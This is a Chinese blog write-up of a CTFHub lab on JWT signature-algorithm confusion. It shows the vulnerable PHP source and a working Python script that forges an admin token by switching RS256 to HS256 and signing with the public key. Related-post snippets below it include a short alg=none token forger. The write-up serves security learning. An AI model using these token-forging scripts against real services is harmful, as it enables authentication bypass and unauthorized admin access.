ctfhub 技能树 JSON Web Token 修改签名算法

最新推荐文章于 2024-05-25 23:30:49 发布
最新推荐文章于 2024-05-25 23:30:49 发布
阅读量1.8k 收藏 4
点赞数 2
分类专栏: jwt 文章标签: web web安全 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/123903314
版权

ctfhub 技能树 JSON Web Token 修改签名算法

有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。

一进入页面,我们发现
页面源码:

<?php
require __DIR__ . '/vendor/autoload.php';
use \Firebase\JWT\JWT;

class JWTHelper {
  public static function encode($payload=array(), $key='', $alg='HS256') {
    return JWT::encode($payload, $key, $alg);
  }
  public static function decode($token, $key, $alg='HS256') {
    try{
            $header = JWTHelper::getHeader($token);
            $algs = array_merge(array($header->alg, $alg));
      return JWT::decode($token, $key, $algs);
    } catch(Exception $e){
      return false;
    }
    }
    public static function getHeader($jwt) {
        $tks = explode('.', $jwt);
        list($headb64, $bodyb64, $cryptob64) = $tks;
        $header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));
        return $header;
    }
}

$FLAG = getenv("FLAG");
$PRIVATE_KEY = file_get_contents("/privatekey.pem");
$PUBLIC_KEY = file_get_contents("./publickey.pem");

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!empty($_POST['username']) && !empty($_POST['password'])) {
        $token = "";
        if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){
            $jwt_payload = array(
                'username' => $_POST['username'],
                'role'=> 'admin',
            );
            $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
        } else {
            $jwt_payload = array(
                'username' => $_POST['username'],
                'role'=> 'guest',
            );
            $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
        }
        @setcookie("token", $token, time()+1800);
        header("Location: /index.php");
        exit();
    } else {
        @setcookie("token", "");
        header("Location: /index.php");
        exit();
    }
} else {
    if(!empty($_COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {
        $obj = JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY);
        if ($obj->role === 'admin') {
            echo $FLAG;
        }
    } else {
        show_source(__FILE__);
    }
}
?>

尝试登录,发现有一串 token
在这里插入图片描述
然后我们将这串token 丢入到jwt
在这里插入图片描述
发现是RS256 编码。
题干中提示我们标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的
查看公匙:
yichuan在这里插入图片描述
一串乱码看不懂。

我们进行源码分析,看能不能有点收获。
如果我们想要获得flag,我们发送的 token 不为空 并且发送的 cookie 为PUBLIC_KEY 也就是公码
并且 role 为 admin。
同时我们看上面:

 public static function encode($payload=array(), $key='', $alg='HS256') {
    return JWT::encode($payload, $key, $alg);
  }
  public static function decode($token, $key, $alg='HS256') {
    try{
            $header = JWTHelper::getHeader($token);
            $algs = array_merge(array($header->alg, $alg));
      return JWT::decode($token, $key, $algs);
    }

发现在 JWTHelper类中,decode()、encode()默认的加密解密方式都为“HS256”
在回想这样一句话

JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false

我们就明白了:
在JWTHelper类的decode()中,如果输入公匙正确,并且后面的if语句正确,那么就会就会显示flag。同时 公匙要HS256加密。
所以我们要对公匙进行HS256加密,加入到token后面
在这里,我们可以自己编写脚本进行加密
或者使用大佬的 脚本
注,要将脚本下载到和本脚本同目录下
在这里插入图片描述

# coding=GBK
import hmac
import hashlib
import base64

file = open('publickey.pem')    #需要将文中的publickey下载	与脚本同目录
key = file.read()

# Paste your header and payload here
header = '{"typ": "JWT", "alg": "HS256"}'
payload = '{"username": "admin", "role": "admin"}'

# Creating encoded header
encodeHBytes = base64.urlsafe_b64encode(header.encode("utf-8"))
encodeHeader = str(encodeHBytes, "utf-8").rstrip("=")

# Creating encoded payload
encodePBytes = base64.urlsafe_b64encode(payload.encode("utf-8"))
encodePayload = str(encodePBytes, "utf-8").rstrip("=")

# Concatenating header and payload
token = (encodeHeader + "." + encodePayload)

# Creating signature
sig = base64.urlsafe_b64encode(hmac.new(bytes(key, "UTF-8"), token.encode("utf-8"), hashlib.sha256).digest()).decode("UTF-8").rstrip("=")

print(token + "." + sig)

在这里插入图片描述

我们放到jwt查看:
在这里插入图片描述
发现公匙中的内容完全就可以找到 flag
我们只需要让我们的payload 放到 token中即可
在这里插入图片描述
当然如果不用 BP 我们也可以直接 f12 以cookie的形式传过去
同样的 postman 也是可以的
在这里插入图片描述

hcjtn
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSON Web Token (前端与后端对话密钥生成文件)
06-28
token 生成文件,用于前后端数据传输时发送的密钥(暗语)。 直接解压后引用该文件即可 -- 后端在收到第一次请求的时候调用 私有的(p开头的) -- 前端发来密钥的时候调用 公用的进行判断是否正确 你也可以自己...
JWT(json web token加密算法) for C# dll 文件,亲测可用
07-02
JSON Web TokenJWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个JSON对象。这个信息可以被验证和信任,因为它是数字签名的。JWT可用于身份验证、授权,以及...
RFC7515- JSON Web Signature (JWS)(JSON Web签名
Jessechanrui的博客
02-23 2505
RFC7515- JSON Web Signature (JWS) 目录 摘要(Abstract) 1. 简介(Introduction) 1.1 符号约定(Notational Conventions) 2. 专业术语(Terminology) 3. JSON Web 签名 (JWS) 概述(JSON Web Signature (JWS) Overview) 3.1 JWS紧凑序列化概述(JWS Compact Serialization Overview) 3.2 JWS JSON序列
ctfhub web技能树进阶JSON Web Token
最新发布
hcja666的博客
05-25 425
若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。进入登陆界面,随便登陆进去,进去后抓包把cookie里面的jwt编码拿去解码,里面有flag,把那两半拼起来即可。用了大佬的脚本,并且加了几句,直接把公钥爬下来。登进去后把cookie的jwt解码,里面的role的值改为admin,python写程序无签名加密。打开题目附件学习jwt基础知识后,将附件中的flag提交就可以了。RS256改HS256
Token签名的设计
包子大叔的笔记
07-01 1063
Token 使用JWT Token JWT设计的好处是不用在服务器保持授权信息,会话不需要服务器维护 缺陷: 1,Token一旦签发,在有效期内不受控制,即服务端修改Token有效期时,之前签发的Token在过期前还是有效的 2,Token在过期后需要重新签发 签名的设计        原理:用户登录后向服务器提供用户认证信息(如账户和密码),服务器认证...
APP开放接口API安全性——Token令牌Sign签名的设计与实现
deng1228的博客
10-11 397
  在APP开放接口API的设计中,避免不了的就是安全性问题。   一、https协议   对于一些敏感的API接口,需要使用https协议。https是在http超文本传输协议加入SSL层,它在网络间通信是加密的,所以需要加密证书。   二、设计签名   原理:用户登录时向服务器提供用户认证信息(如账号和密码),服务器认证完后给客户端返回一个Token令牌,用户再次获取信息时,...
ctf-hub web进阶(JWT)
h0ld1rs的博客
10-19 1675
敏感信息泄露 http://jwt.io 使用这个网站,把token进行加载即可 然后两部分拼接即可 无签名 none时侯,一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证 import jwt token = jwt.encode( { "username": "admin", "password": "admin", "role":"admin" }, algorithm="none",key="" ) print(token) 最后可以得到 e
单点登录中的JSON WEB TOKEN的使用方法C#版
03-21
Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。本实例还原了整个的使用流程。建议...
详解JSON Web Token 入门教程
10-18
主要介绍了详解JSON Web Token 入门教程,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
php实现JWT(json web token)鉴权实例详解
10-16
JSON Web Token (JWT) 是一种安全的身份验证和授权机制,常用于API的无状态认证。在PHP中实现JWT鉴权,通常涉及以下几个关键步骤和概念: 1. **JWT的结构**: JWT由三部分组成:Header、PayloadSignature。...
网页修改token登录网站
_冷冷的博客
08-25 1793
5、把你拿到的token值放入Token对应的Value内;3、点击开发者工具的Application;4、点击开发者工具左侧Cookies;1、浏览器打开要登录的网站;2、F12点开开发者工具;
关于token签名、加密的一点理解
NeverSayNever
06-07 1万+
转自:https://blog.csdn.net/maocai008/article/details/79064542在之前的工作中,总是接触到这些概念,之前都是零散的理解,在此总结下,以方便以后查阅一、token 在网站、app与服务器交互的过程中,很多时候为了:1、避免用户多次输入密码2、实现自动登陆3、避免在终端直接存储用户的密码4、标示客户端的请求是否合法5、其他(暂时没想到)我们需要引入...
加密,签名token解释及场景分析
Charles Ren's Tech Blog
10-30 3288
文章目录加密使用场景对称加密和非对称加密签名使用场景含义Tokencookie和session 参考文章:数据的加密与签名 彻底理解cookie,session,token 加密 使用场景 当我们传输数据时,如果数据被截获了,那么其他人就可以看到内容了,这时需要加密算法来对数据进行加密,这样其他人截获也只能看到乱码。 过程: 发送者对明文使用密钥加密然后生成密文,接受者再对密文解密得到明文的过程。...
Day69:WEB攻防-Java安全&JWT攻防&Swagger自动化&算法&签名&密匙&Druid泄漏
qq_61553520的博客
03-18 1263
小迪安全-Day69:WEB攻防-Java安全&JWT攻防&Swagger自动化&算法&签名&密匙&Druid泄漏
Token原理
只为成功找方法 不为失败找借口
03-25 3675
服务端在接收到 Token 后,会先对 Token 进行拆分,然后使用相同的密钥和哈希算法计算 Token 中的数据的签名,并将其与 Token 末尾的签名串进行比较,以判断 Token 是否合法。这样,客户端就可以在以后的请求中使用新的 token。总的来说,token 认证的流程是在用户登录时获取 token,之后在 HTTP 请求头里携带 token,服务端在响应请求时对 token 进行验证并返回相应结果,同时可以在响应头中返回新的 token(用于更新之前的 token)。
JWT签名算法
weixin_30745641的博客
08-17 1729
JWT签名算法 JWT签名算法中,一般有两个选择,一个采用HS256,另外一个就是采用RS256。 签名实际上是一个加密的过程,生成一段标识(也是JWT的一部分)作为接收方验证信息是否被篡改的依据。 RS256 (采用SHA-256 的 RSA 签名) 是一种非对称算法, 它使用公共/私钥对: 标识提供方采用私钥生成签名, JWT 的使用方获取公钥以验证签名。由于公钥 (与私钥...
CTFHUB技能树(全详细解析含进阶)
热门推荐
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
ctfhub技能树web基础认证
03-13
CTFHub是一个CTF(Capture The Flag)竞赛平台,提供了丰富的技能树来帮助学习者提升Web基础认证的能力。下面是CTFHub技能树中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET、POST等),了解HTTP请求和响应的结构。 2. URL编码和解码:学习URL编码和解码的原理和常见的编码方式,如URL编码中的%20代表空格。 3. Cookies:了解Cookies的作用和原理,学习如何使用Cookies进行用户认证和状态管理。 4. Session管理:学习Session的概念和原理,了解如何使用Session进行用户认证和状态管理。 5. 基本认证(Basic Authentication):学习基本认证的原理和流程,了解如何使用用户名和密码进行认证。 6. 表单认证(Form-based Authentication):学习表单认证的原理和流程,了解如何使用表单提交用户名和密码进行认证。 7. Token认证:学习Token认证的原理和流程,了解如何使用Token进行用户认证和状态管理。 8. CSRF攻击与防御:学习CSRF(Cross-Site Request Forgery)攻击的原理和常见的防御措施9. XSS攻击与防御:学习XSS(Cross-Site Scripting)攻击的原理和常见的防御措施10. SQL注入攻击与防御:学习SQL注入攻击的原理和常见的防御措施。 以上是CTFHub技能树中关于Web基础认证的内容,通过学习这些知识,你可以提升自己在Web安全领域的认证技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值